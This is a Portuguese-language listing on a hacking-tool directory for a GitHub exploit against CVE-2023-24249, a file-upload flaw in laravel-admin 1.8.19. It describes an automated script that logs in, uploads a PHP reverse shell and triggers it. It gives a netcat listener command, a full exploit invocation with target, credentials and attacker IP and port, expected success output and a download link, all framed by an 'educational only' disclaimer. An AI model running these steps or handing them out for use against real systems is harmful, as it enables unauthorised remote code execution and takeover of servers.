Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-24249-Exploit — Script de exploit para CVE-2023-24249 - uma vulnerabilidade que permite execução remota de código via upload de arquivos e injeção de comandos. | Kitploit
Ferramentas/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHub

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
iduzzel/cve-2023-24249-exploit

CVE-2023-24249-Exploit

Script de exploit para CVE-2023-24249 - uma vulnerabilidade que permite execução remota de código via upload de arquivos e injeção de comandos.

Ver Repositório
9118há 2 anosAinda não revisado
Compartilhar

Script de Exploit CVE-2023-24249

Descrição

Este repositório contém um script de exploit para a CVE-2023-24249, uma vulnerabilidade crítica encontrada no laravel-admin versão 1.8.19. Essa vulnerabilidade permite o upload arbitrário de arquivos, possibilitando que atacantes executem código arbitrário por meio de um arquivo PHP malicioso. O exploit demonstra como um atacante pode enviar uma reverse shell para o aplicativo alvo e executá-la para obter acesso remoto.

Detalhes da Vulnerabilidade

CVE-2023-24249 é uma vulnerabilidade de upload arbitrário de arquivos no laravel-admin v1.8.19. Essa vulnerabilidade permite que atacantes enviem e executem arquivos PHP arbitrários, levando a uma possível execução remota de código.

  • Pontuação Base: 7.2 ALTA
  • Vetor: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • Enumeração de Fraquezas: CWE-434 - Upload sem Restrições de Arquivo com Tipo Perigoso

Referências

  • Exploit - Consultoria de Terceiros
  • Repositório do Laravel Admin no GitHub
  • Site Oficial do Laravel Admin

Script de Exploit

O script de exploit fornecido automatiza o processo de exploração da CVE-2023-24249. Ele executa as seguintes etapas:

  1. Autenticar: Faz login no aplicativo alvo usando as credenciais fornecidas.
  2. Enviar Reverse Shell: Envia um script de reverse shell em PHP por meio da funcionalidade vulnerável de upload de arquivos.
  3. Executar Reverse Shell: Envia uma solicitação GET para o script de reverse shell enviado, a fim de executá-lo e estabelecer uma conexão de volta para a máquina do atacante.

Requisitos

  • Python 3
  • Biblioteca requests
  • Biblioteca beautifulsoup4

Instale as bibliotecas necessárias usando pip:

pip install requests beautifulsoup4

Uso

  1. Clone o repositório:

    git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
    cd CVE-2023-24249-Exploit
    
  2. Inicie um listener na sua máquina:

    nc -lvnp <PORT>
    
  3. Execute o script de exploit:

    python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
    

    Substitua <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> e <YOUR_PORT> pelos valores apropriados:

    • <TARGET_URL>: A URL do aplicativo alvo.
    • <USERNAME>: O nome de usuário para autenticação.
    • <PASSWORD>: A senha para autenticação.
    • <YOUR_IP>: Seu endereço IP para receber a conexão da reverse shell.
    • <YOUR_PORT>: A porta na qual seu listener está executando.

Exemplo

python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337

Saída do Script

Se o exploit for bem-sucedido, o script exibirá:

[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>

Aviso Legal

Este script destina-se apenas a fins educacionais. O uso não autorizado deste script contra qualquer sistema sem permissão explícita é ilegal e antiético. O autor não é responsável por qualquer uso indevido ou dano causado por este script.

Baixar ferramenta